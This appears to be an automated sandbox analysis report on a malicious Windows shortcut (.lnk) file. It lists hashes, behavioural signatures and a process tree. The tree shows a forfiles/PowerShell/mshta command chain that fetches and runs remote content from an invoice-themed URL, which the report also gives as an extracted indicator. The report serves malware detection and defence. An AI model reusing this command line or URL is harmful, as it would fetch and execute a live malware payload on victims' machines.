Analysis
-
max time kernel
142s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
17-05-2024 12:12
Static task
static1
Behavioral task
behavioral1
Sample
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
Resource
win10v2004-20240508-en
General
-
Target
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk
-
Size
148KB
-
MD5
d39a73de9f109e3dba408e9481998206
-
SHA1
30651dada81443db0fde9c3a336955d27b6d9024
-
SHA256
84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30
-
SHA512
09c8954ecabbeb36aeb8804858168eb1448f5894c1641a1ba5311f2b33aaeb24814734d0b1f7e777f22910c53bb9df500801907a603d8d71fba139705f444d61
-
SSDEEP
24:8WEe6Dz358m+pyAWkr+/4x+sPxZvBG0qdd79ds/Z6U/ab9Q9qFBm:8WENDzKvZbnvBG7dJ9A6U/a5QW
Malware Config
Extracted
https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2096 powershell.exe 2096 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2096 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exeforfiles.exepowershell.exedescription pid process target process PID 100 wrote to memory of 1004 100 cmd.exe forfiles.exe PID 100 wrote to memory of 1004 100 cmd.exe forfiles.exe PID 1004 wrote to memory of 2096 1004 forfiles.exe powershell.exe PID 1004 wrote to memory of 2096 1004 forfiles.exe powershell.exe PID 2096 wrote to memory of 4864 2096 powershell.exe mshta.exe PID 2096 wrote to memory of 4864 2096 powershell.exe mshta.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\84297536d9873d971dcc783ae2f95af8cbf32c65fccf3c8687af2ba5294b7f30.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\System32\forfiles.exe"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice"2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe. mshta https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://invoiceinformations.com/InvoiceInfo/Evernote-Invoice4⤵PID:4864
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82